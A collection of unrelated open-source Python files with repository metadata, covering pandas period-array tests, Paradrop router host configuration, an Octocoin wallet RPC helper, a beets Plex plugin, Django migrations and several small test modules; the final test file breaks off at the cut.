from .saga_database import *
|
{
"content_hash": "53bb71b88c83208e9abb6b43fc096661",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 70,
"avg_line_length": 18,
"alnum_prop": 0.7638888888888888,
"repo_name": "sagasurvey/saga",
"id": "7f022be3405d60f5fe8280387481a6b1591501e6",
"size": "144",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SAGA/database/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "376969"
},
{
"name": "Shell",
"bytes": "71"
}
],
"symlink_target": ""
}
|
import numpy as np
import pytest
import pandas as pd
import pandas.util.testing as tm
from pandas._libs.tslib import iNaT
from pandas.core.arrays import PeriodArray
from pandas.core.dtypes.dtypes import PeriodDtype
from pandas.tests.extension import base
@pytest.fixture
def dtype():
return PeriodDtype(freq='D')
@pytest.fixture
def data(dtype):
return PeriodArray(np.arange(1970, 2070), freq=dtype.freq)
@pytest.fixture
def data_for_sorting(dtype):
return PeriodArray([2018, 2019, 2017], freq=dtype.freq)
@pytest.fixture
def data_missing(dtype):
return PeriodArray([iNaT, 2017], freq=dtype.freq)
@pytest.fixture
def data_missing_for_sorting(dtype):
return PeriodArray([2018, iNaT, 2017], freq=dtype.freq)
@pytest.fixture
def data_for_grouping(dtype):
B = 2018
NA = iNaT
A = 2017
C = 2019
return PeriodArray([B, B, NA, NA, A, A, B, C], freq=dtype.freq)
@pytest.fixture
def na_value():
return pd.NaT
class BasePeriodTests(object):
pass
class TestPeriodDtype(BasePeriodTests, base.BaseDtypeTests):
pass
class TestConstructors(BasePeriodTests, base.BaseConstructorsTests):
pass
class TestGetitem(BasePeriodTests, base.BaseGetitemTests):
pass
class TestMethods(BasePeriodTests, base.BaseMethodsTests):
def test_combine_add(self, data_repeated):
# Period + Period is not defined.
pass
class TestInterface(BasePeriodTests, base.BaseInterfaceTests):
def test_no_values_attribute(self, data):
# We have a values attribute.
pass
class TestArithmeticOps(BasePeriodTests, base.BaseArithmeticOpsTests):
implements = {'__sub__', '__rsub__'}
def test_arith_series_with_scalar(self, data, all_arithmetic_operators):
# we implement substitution...
if all_arithmetic_operators in self.implements:
s = pd.Series(data)
self.check_opname(s, all_arithmetic_operators, s.iloc[0],
exc=None)
else:
# ... but not the rest.
super(TestArithmeticOps, self).test_arith_series_with_scalar(
data, all_arithmetic_operators
)
def test_arith_series_with_array(self, data, all_arithmetic_operators):
if all_arithmetic_operators in self.implements:
s = pd.Series(data)
self.check_opname(s, all_arithmetic_operators, s.iloc[0],
exc=None)
else:
# ... but not the rest.
super(TestArithmeticOps, self).test_arith_series_with_scalar(
data, all_arithmetic_operators
)
def _check_divmod_op(self, s, op, other, exc=NotImplementedError):
super(TestArithmeticOps, self)._check_divmod_op(
s, op, other, exc=TypeError
)
def test_add_series_with_extension_array(self, data):
# we don't implement + for Period
s = pd.Series(data)
msg = (r"unsupported operand type\(s\) for \+: "
r"\'PeriodArray\' and \'PeriodArray\'")
with tm.assert_raises_regex(TypeError, msg):
s + data
def test_error(self):
pass
def test_direct_arith_with_series_returns_not_implemented(self, data):
# Override to use __sub__ instead of __add__
other = pd.Series(data)
result = data.__sub__(other)
assert result is NotImplemented
class TestCasting(BasePeriodTests, base.BaseCastingTests):
pass
class TestComparisonOps(BasePeriodTests, base.BaseComparisonOpsTests):
def _compare_other(self, s, data, op_name, other):
# the base test is not appropriate for us. We raise on comparison
# with (some) integers, depending on the value.
pass
class TestMissing(BasePeriodTests, base.BaseMissingTests):
pass
class TestReshaping(BasePeriodTests, base.BaseReshapingTests):
pass
class TestSetitem(BasePeriodTests, base.BaseSetitemTests):
pass
class TestGroupby(BasePeriodTests, base.BaseGroupbyTests):
pass
|
{
"content_hash": "29b8c6f3e93061ac871821637be8a958",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 76,
"avg_line_length": 25.941935483870967,
"alnum_prop": 0.6600348172096493,
"repo_name": "amolkahat/pandas",
"id": "6f59cbb66a145d65c274df0c394bd0b2a8a1e90a",
"size": "4021",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pandas/tests/extension/test_period.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4907"
},
{
"name": "C",
"bytes": "404689"
},
{
"name": "C++",
"bytes": "17194"
},
{
"name": "HTML",
"bytes": "551714"
},
{
"name": "Makefile",
"bytes": "574"
},
{
"name": "Python",
"bytes": "14254373"
},
{
"name": "Shell",
"bytes": "28262"
},
{
"name": "Smarty",
"bytes": "2069"
}
],
"symlink_target": ""
}
|
import tests
class ATestCase(tests.BaseTestCase):
def test_logging_configuration_loaded(self):
self.assertTrue(self.logger is not None)
def test_configuration_loaded(self):
self.assertTrue(self.configuration is not None)
def test_configuration_contents(self):
self.assertTrue('vermazelend' in self.configuration)
self.assertTrue('key' in self.configuration['vermazelend'])
self.assertEquals(self.configuration['vermazelend']['key'], 'value')
|
{
"content_hash": "5268395fb9bba3d8bc1af5eaadc18b3e",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 76,
"avg_line_length": 33.266666666666666,
"alnum_prop": 0.7154308617234469,
"repo_name": "collectdbit/verzamelend",
"id": "68fa01ae632bd222ab280c4cd71163d43f8057ad",
"size": "499",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/basic_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "29075"
},
{
"name": "Shell",
"bytes": "63"
}
],
"symlink_target": ""
}
|
from django.core.management.base import BaseCommand
from corehq.apps.domain.models import Domain
class Command(BaseCommand):
help = "Marks most recent snapshot of a domain"
args = ""
def handle(self, *args, **options):
print "Migrating snapshot documents to have a marked head"
for domain in Domain.get_all(include_docs=False):
head = Domain.view(
'domain/snapshots',
startkey=[domain['id'], {}],
endkey=[domain['id'], None],
reduce=False,
include_docs=True,
descending=True,
limit=1
).first()
if head:
head.snapshot_head = True
head.save()
|
{
"content_hash": "0b668dfe6be41c036bc7097b812d8e72",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 66,
"avg_line_length": 31.375,
"alnum_prop": 0.5378486055776892,
"repo_name": "qedsoftware/commcare-hq",
"id": "3afdaa6c2ae64bb8fa42c067a730a1282432a601",
"size": "753",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "corehq/apps/domain/management/commands/mark_snapshot_head.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "15950"
},
{
"name": "CSS",
"bytes": "508392"
},
{
"name": "HTML",
"bytes": "2869325"
},
{
"name": "JavaScript",
"bytes": "2395360"
},
{
"name": "PHP",
"bytes": "2232"
},
{
"name": "PLpgSQL",
"bytes": "125298"
},
{
"name": "Python",
"bytes": "14670713"
},
{
"name": "Shell",
"bytes": "37514"
}
],
"symlink_target": ""
}
|
"""
The host configuration controls system settings of the host OS.
This module operates as follows:
1. The first time, we try to detect all devices and auto-generate
a reasonable configuration, which we store to a persistent file.
2. (TODO) We present the configuration to the owner sometime around
provisioning or first chute creation and allow him to change settings.
3. (TODO) We have some kind of update operation that can manipulate
settings.
"""
import ipaddress
import jsonpatch
import yaml
from paradrop.base import settings
from paradrop.lib.utils import pdosq
from . import devices as config_devices
# This patch ensures the "unicode" function exists and behaves consistently
# between Python 2 and 3. Normally, it is recommended to use "builtins.str" for
# compatibility, but that uses a different class type not recognized by PyYAML.
try:
unicode('')
except NameError:
unicode = str
CHANNELS_24G = [1, 6, 11]
CHANNELS_5G = [36, 40, 44, 48, 149, 153, 157, 161, 165]
WIFI_DEVICE_CAPS = {
# WLE200NX
("0x168c", "0x002a"): {
"hwmode": ["11a", "11g"]
},
# WLE600VX
("0x168c", "0x003c"): {
"hwmode": ["11a", "11g"]
},
"default": {
"hwmode": ["11g"]
}
}
WIFI_DEVICE_PROFILE = {
# WLE200NX
("0x168c", "0x002a"): {
"htmode": "HT20",
"tx_stbc": 1,
"rx_stbc": 1,
"short_gi_40": True,
},
# WLE600VX
("0x168c", "0x003c"): {
"htmode": "VHT20",
"tx_stbc": 1,
"rx_stbc": 1,
"short_gi_20": True,
"short_gi_40": True,
"short_gi_80": True
},
"default": {}
}
def save(config, path=None):
"""
Save host configuration.
May raise exception if unable to write the configuration file.
"""
if path is None:
path = settings.HOST_CONFIG_FILE
with open(path, 'w') as output:
output.write(yaml.safe_dump(config, default_flow_style=False))
def load(path=None):
"""
Load host configuration.
Tries to load host configuration from persistent file. If that does not
work, it will try to automatically generate a working configuration.
Returns a host config object on success or None on failure.
"""
if path is None:
path = settings.HOST_CONFIG_FILE
return pdosq.read_yaml_file(path, default=None)
def generateHostConfig(devices):
"""
Scan for devices on the machine and generate a working configuration.
"""
config = dict()
default_lan_network = ipaddress.ip_network(unicode(settings.DEFAULT_LAN_NETWORK))
config['firewall'] = {
'defaults': {
'input': 'ACCEPT',
'output': 'ACCEPT',
'forward': 'ACCEPT'
}
}
config['lan'] = {
'interfaces': list(),
'proto': 'static',
'ipaddr': settings.DEFAULT_LAN_ADDRESS,
'netmask': unicode(default_lan_network.netmask),
'dhcp': {
'start': 100,
'limit': 100,
'leasetime': '12h'
},
'firewall': {
'defaults': {
'conntrack': '1',
'input': 'ACCEPT',
'output': 'ACCEPT',
'forward': 'ACCEPT'
},
'forwarding': []
}
}
config['wifi'] = list()
config['wifi-interfaces'] = list()
config['system'] = {
'autoUpdate': True,
'chuteSubnetPool': settings.DYNAMIC_NETWORK_POOL,
'chutePrefixSize': 24,
'onMissingWiFi': None
}
config['telemetry'] = {
'enabled': True,
'interval': 60
}
config['zerotier'] = {
'enabled': True,
'networks': []
}
if len(devices['wan']) > 0:
wanDev = devices['wan'][0]
config['wan'] = {
'interface': wanDev['name'],
'proto': 'dhcp',
'firewall': {
'defaults': {
'conntrack': '1',
'masq': '1',
'input': 'ACCEPT',
'output': 'ACCEPT',
'forward': 'ACCEPT',
'masq_src': [
settings.DEFAULT_LAN_NETWORK,
settings.DYNAMIC_NETWORK_POOL
]
}
}
}
# Add a rule that forwards LAN traffic to WAN.
config['lan']['firewall']['forwarding'].append({
'src': 'lan',
'dest': 'wan'
})
for lanDev in devices['lan']:
config['lan']['interfaces'].append(lanDev['name'])
# Counters to help with channel assignment.
serial = config_devices.get_hardware_serial()
wifi_24_assigned = 0
wifi_5_assigned = 0
for wifiDev in devices['wifi']:
pair = (wifiDev['vendor'], wifiDev['device'])
if pair in WIFI_DEVICE_PROFILE:
new_config = WIFI_DEVICE_PROFILE[pair].copy()
wifi_caps = WIFI_DEVICE_CAPS[pair]
else:
new_config = WIFI_DEVICE_PROFILE['default'].copy()
wifi_caps = WIFI_DEVICE_CAPS["default"]
# Skip odd devices that are missing this field.
if 'id' not in wifiDev:
continue
new_config['id'] = wifiDev['id']
# This logic will assign a 5 Ghz channel to the first 5 Ghz-capable
# device. It will then alternate between 2.4 Ghz and 5 Ghz.
choose_5g = "11a" in wifi_caps.get('hwmode', []) and \
wifi_5_assigned <= wifi_24_assigned
if choose_5g:
chan_index = (serial + wifi_5_assigned) % len(CHANNELS_5G)
new_config['channel'] = CHANNELS_5G[chan_index]
new_config['hwmode'] = "11a"
wifi_5_assigned += 1
else:
chan_index = (serial + wifi_24_assigned) % len(CHANNELS_24G)
new_config['channel'] = CHANNELS_24G[chan_index]
new_config['hwmode'] = "11g"
wifi_24_assigned += 1
config['wifi'].append(new_config)
if len(config['wifi']) > 0 and settings.DEFAULT_WIRELESS_ENABLED:
# If we detect WiFi devices now, configure the system to warn if they
# are missing later. Production systems should be configured with
# "reboot".
config['system']['onMissingWiFi'] = "warn"
# Add a default WiFi AP for usability.
new_iface = {
'device': devices['wifi'][0]['id'],
'ssid': settings.DEFAULT_WIRELESS_ESSID,
'mode': 'ap',
'network': 'lan'
}
if settings.DEFAULT_WIRELESS_KEY:
new_iface['encryption'] = "psk2"
new_iface['key'] = settings.DEFAULT_WIRELESS_KEY
config['wifi-interfaces'].append(new_iface)
return config
def prepareHostConfig(devices=None, hostConfigPath=None, write=True):
"""
Load an existing host configuration or generate one.
Tries to load host configuration from persistent file. If that does not
work, it will try to automatically generate a working configuration.
write: if True and host config was automatically generated, then write
the new host config to a file.
"""
config = load(hostConfigPath)
if config is not None:
return config
if devices is None:
devices = config_devices.detectSystemDevices()
config = generateHostConfig(devices)
if write:
save(config)
return config
#
# Chute update operations
#
def getHostConfig(update):
"""
Load host configuration.
Read device information from networkDevices.
Store host configuration in hostConfig.
"""
# TODO We need to check for changes in hardware. If a new device was
# added, we should try to automatically configure it. If a device was
# removed, we should be aware of what is no longer valid.
devices = update.cache_get('networkDevices')
config = prepareHostConfig(devices)
# update.old is not guaranteed to contain the old host configuration, so
# save a backup copy in update.new. This will be used by revertHostConfig
# if we need to back out.
update.cache_set('oldHostConfig', config)
# If this is a sethostconfig operation, then read the host config from the
# update object. Ordinary chute operations should not alter the host
# configuration.
if update.updateType == 'sethostconfig':
config = update.hostconfig
elif update.updateType == 'patchhostconfig':
config = jsonpatch.apply_patch(config, update.patch)
# For factoryreset, try to load the default configuration or automatically
# generate a new one if the file is not found.
elif update.updateType == 'factoryreset':
config = prepareHostConfig(devices,
hostConfigPath=settings.DEFAULT_HOST_CONFIG_FILE)
update.cache_set('hostConfig', config)
def setHostConfig(update):
"""
Write host configuration to persistent storage.
Read host configuration from hostConfig.
"""
config = update.cache_get('hostConfig')
save(config)
def revertHostConfig(update):
"""
Restore host configuration from before update.
Uses oldHostConfig cache entry.
"""
config = update.cache_get('oldHostConfig')
save(config)
|
{
"content_hash": "9e53a4465098dfb0a87f26f78dfd66eb",
"timestamp": "",
"source": "github",
"line_count": 329,
"max_line_length": 85,
"avg_line_length": 28.145896656534955,
"alnum_prop": 0.588012958963283,
"repo_name": "ParadropLabs/Paradrop",
"id": "109114c520fc223a5a6b853a68b21211304f3707",
"size": "9260",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "paradrop/daemon/paradrop/core/config/hostconfig.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "148071"
},
{
"name": "Dockerfile",
"bytes": "10449"
},
{
"name": "HTML",
"bytes": "554"
},
{
"name": "Makefile",
"bytes": "1665"
},
{
"name": "Python",
"bytes": "1049444"
},
{
"name": "Shell",
"bytes": "9897"
}
],
"symlink_target": ""
}
|
from jsonrpc import ServiceProxy
import sys
import string
import getpass
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:9332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:9332")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "encryptwallet":
try:
pwd = getpass.getpass(prompt="Enter passphrase: ")
pwd2 = getpass.getpass(prompt="Repeat passphrase: ")
if pwd == pwd2:
access.encryptwallet(pwd)
print "\n---Wallet encrypted. Server stopping, restart to run with encrypted wallet---\n"
else:
print "\n---Passphrases do not match---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Octocoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Octocoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = getpass.getpass(prompt="Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = getpass.getpass(prompt="Enter old wallet passphrase: ")
pwd2 = getpass.getpass(prompt="Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
|
{
"content_hash": "3cb827b83781815be24670cf30eea434",
"timestamp": "",
"source": "github",
"line_count": 337,
"max_line_length": 101,
"avg_line_length": 28.679525222551927,
"alnum_prop": 0.5685463010863943,
"repo_name": "my-first/octocoin",
"id": "b3ac04b2a25cd1b74231bcd28aed3ef684e0abe3",
"size": "9665",
"binary": false,
"copies": "2",
"ref": "refs/heads/master-0.10",
"path": "contrib/bitrpc/bitrpc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "7639"
},
{
"name": "C",
"bytes": "343323"
},
{
"name": "C++",
"bytes": "3532257"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "Groff",
"bytes": "18088"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2100"
},
{
"name": "M4",
"bytes": "144762"
},
{
"name": "Makefile",
"bytes": "83451"
},
{
"name": "Objective-C",
"bytes": "2023"
},
{
"name": "Objective-C++",
"bytes": "7240"
},
{
"name": "Protocol Buffer",
"bytes": "2309"
},
{
"name": "Python",
"bytes": "222283"
},
{
"name": "QMake",
"bytes": "2020"
},
{
"name": "Shell",
"bytes": "40592"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
from quotes.models import Quote
class QuoteTestCase(TestCase):
def test_create(self):
ts = Quote(author="A", text="ABC")
ts.save()
self.assertEqual(str(ts), "A ABC")
|
{
"content_hash": "22cdfbb36cd5b8911e44ae6bb5423b28",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 42,
"avg_line_length": 22.9,
"alnum_prop": 0.6506550218340611,
"repo_name": "eged/cmsplugin-quotes",
"id": "5ab603a5f7c4ab01c2e7e6a069d379306b528514",
"size": "229",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cmsplugin_quotes/tests/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "8423"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0034_simplify_transfer_status'),
]
operations = [
migrations.AddField(
model_name='layer',
name='max_x',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layer',
name='max_y',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layer',
name='min_x',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layer',
name='min_y',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layerimage',
name='max_x',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layerimage',
name='max_y',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layerimage',
name='min_x',
field=models.FloatField(default=None, null=True, blank=True),
),
migrations.AddField(
model_name='layerimage',
name='min_y',
field=models.FloatField(default=None, null=True, blank=True),
),
]
|
{
"content_hash": "60a64594b8fd70ffd84b20c8b6e1d538",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 73,
"avg_line_length": 30.641509433962263,
"alnum_prop": 0.5431034482758621,
"repo_name": "kdeloach/raster-foundry",
"id": "eb9c50a7f96b5e0a42f4556d835fd1566f81a3a6",
"size": "1648",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "src/rf/apps/core/migrations/0035_add_image_layer_bounding_box.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "125238"
},
{
"name": "HTML",
"bytes": "146101"
},
{
"name": "JavaScript",
"bytes": "146746"
},
{
"name": "Python",
"bytes": "261223"
},
{
"name": "Ruby",
"bytes": "1213"
},
{
"name": "Shell",
"bytes": "10179"
}
],
"symlink_target": ""
}
|
"""Updates an Plex library whenever the beets library is changed.
Put something like the following in your config.yaml to configure:
plex:
host: localhost
port: 32400
"""
from __future__ import (division, absolute_import, print_function,
unicode_literals)
import requests
from urlparse import urljoin
import xml.etree.ElementTree as ET
from beets import config
from beets.plugins import BeetsPlugin
def get_music_section(host, port):
"""Getting the section key for the music library in Plex.
"""
api_endpoint = 'library/sections'
url = urljoin('http://{0}:{1}'.format(host, port), api_endpoint)
# Sends request.
r = requests.get(url)
# Parse xml tree and extract music section key.
tree = ET.fromstring(r.text)
for child in tree.findall('Directory'):
if child.get('title') == 'Music':
return child.get('key')
def update_plex(host, port):
"""Sends request to the Plex api to start a library refresh.
"""
# Getting section key and build url.
section_key = get_music_section(host, port)
api_endpoint = 'library/sections/{0}/refresh'.format(section_key)
url = urljoin('http://{0}:{1}'.format(host, port), api_endpoint)
# Sends request and returns requests object.
r = requests.get(url)
return r
class PlexUpdate(BeetsPlugin):
def __init__(self):
super(PlexUpdate, self).__init__()
# Adding defaults.
config['plex'].add({
u'host': u'localhost',
u'port': 32400})
self.register_listener('database_change', self.listen_for_db_change)
def listen_for_db_change(self, lib, model):
"""Listens for beets db change and register the update for the end"""
self.register_listener('cli_exit', self.update)
def update(self, lib):
"""When the client exists try to send refresh request to Plex server.
"""
self._log.info('Updating Plex library...')
# Try to send update request.
try:
update_plex(
config['plex']['host'].get(),
config['plex']['port'].get())
self._log.info('... started.')
except requests.exceptions.RequestException:
self._log.warning('Update failed.')
|
{
"content_hash": "9625c585e7327f0f42ce75ee6ca8f84d",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 77,
"avg_line_length": 30.68,
"alnum_prop": 0.6205997392438071,
"repo_name": "ttsda/beets",
"id": "5aa096486ef99448792248b1eac638f557c76890",
"size": "2301",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "beetsplug/plexupdate.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2951"
},
{
"name": "HTML",
"bytes": "3307"
},
{
"name": "JavaScript",
"bytes": "85950"
},
{
"name": "Python",
"bytes": "1525413"
},
{
"name": "Shell",
"bytes": "7413"
}
],
"symlink_target": ""
}
|
import contextlib
import shutil
import tempfile
import unittest
import os.path as op
import macholib
DYLIB_DIRECTORY = op.join(op.dirname(__file__), "data")
FOO_DYLIB = op.join(DYLIB_DIRECTORY, "foo.dylib")
FILES_TO_INSTALL_NAME = {
FOO_DYLIB: "foo.dylib",
op.join(DYLIB_DIRECTORY, "foo2.dylib"): "yoyo.dylib",
}
FILES_TO_RPATHS = {
FOO_DYLIB: [],
op.join(DYLIB_DIRECTORY, "foo_rpath.dylib"): ["@loader_path/../lib"],
}
SIMPLE_MAIN = op.join(DYLIB_DIRECTORY, "main")
FILES_TO_DEPENDENCY_NAMES = {
SIMPLE_MAIN: ["bar.1.0.0.dylib", "/usr/lib/libSystem.B.dylib"]
}
SIMPLE_BUNDLE = op.join(DYLIB_DIRECTORY, "foo.bundle")
NO_MACHO_FILE = op.join(DYLIB_DIRECTORY, "Makefile")
TINY_FILE = op.join(DYLIB_DIRECTORY, "tiny")
@contextlib.contextmanager
def mkdtemp():
d = tempfile.mkdtemp()
yield d
shutil.rmtree(d)
class BaseMachOCommandTestCase(unittest.TestCase):
def assert_commands_equal(self, filename, r_filename, filters=None):
"""Check that the mach-o header commands are the same in filename and
r_filename, except for the commands which id are in filter_ids."""
if filters is None:
filters = {}
r_m = macholib.MachO.MachO(r_filename)
m = macholib.MachO.MachO(filename)
# We don't really support multi-arch mach-o for now
self.assertEqual(len(r_m.headers), 1)
self.assertEqual(len(r_m.headers), len(m.headers))
r_header = r_m.headers[0]
header = m.headers[0]
self.assertEqual(len(r_header.commands), len(header.commands))
for r_cmd, cmd in zip(r_header.commands, header.commands):
filter = filters.get(r_cmd[0].cmd, lambda x: x)
self.assertEqual(filter(r_cmd), filter(cmd))
|
{
"content_hash": "4ea328abbbbc205d13f8b5e21e3ae7fa",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 77,
"avg_line_length": 28.80327868852459,
"alnum_prop": 0.6573705179282868,
"repo_name": "pombredanne/machotools",
"id": "5618bbaab24490090f08c58ac83ce805784d44ec",
"size": "1757",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "machotools/tests/common.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "211"
},
{
"name": "Makefile",
"bytes": "666"
},
{
"name": "Python",
"bytes": "34754"
}
],
"symlink_target": ""
}
|
import time
import unittest
from newsApp.clusterTableManager import ClusterTableManager
from newsApp.cluster import Cluster
class ClusterTableManagerTests(unittest.TestCase):
@classmethod
def setUpClass(self):
